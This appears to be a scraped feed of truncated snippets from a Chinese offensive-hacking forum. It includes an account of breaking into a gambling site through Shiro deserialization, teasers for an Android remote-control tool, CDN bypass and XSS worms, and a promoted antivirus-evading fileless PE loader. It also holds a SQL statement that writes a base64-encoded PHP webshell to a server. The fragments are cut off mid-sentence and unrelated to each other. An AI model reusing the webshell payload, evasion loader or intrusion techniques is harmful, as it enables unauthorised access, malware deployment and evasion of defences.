一次工作摸鱼的时候，找到一个博彩站点，看了一眼主站有waf显然打不通，结果在找其他资产的时候发现一个 '老破站' 。 找到它后台爆破的时候发现shiro反序列化，这不是直接一键getshll吗？（有手...

ChatTTS 一键安装包下载：https://xsx.tw/ai/4105/

moukthar Android远程管理工具（安卓网页控）

绕过CDN寻找网站真实IP地址技巧

后台(内网)打穿神器→xss蠕虫

API访问控制 K8S的API访问控制就是，通过如kubectl、构造REST请求，去访问Kubernetes的API，当请求到达API时经历的多个阶段就是k8s的API访问控制，而RBAC就是其中鉴权的部分，并且是现在的主要...

select '<?php file_put_contents('abab.php',base64_decode('Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0l...

https://teraboxapp.com/s/1IZ5-b0Bj5YH5S-AtQH26Tg

FilelessPELoader 免杀加载 分享一个好用的 PE 远程加载项目 https://github.com/TheD1rkMtr/FilelessPELoader 远程内存加载，免杀大部分的杀软 1、首先安装相关 python 库 pip install pycrypt...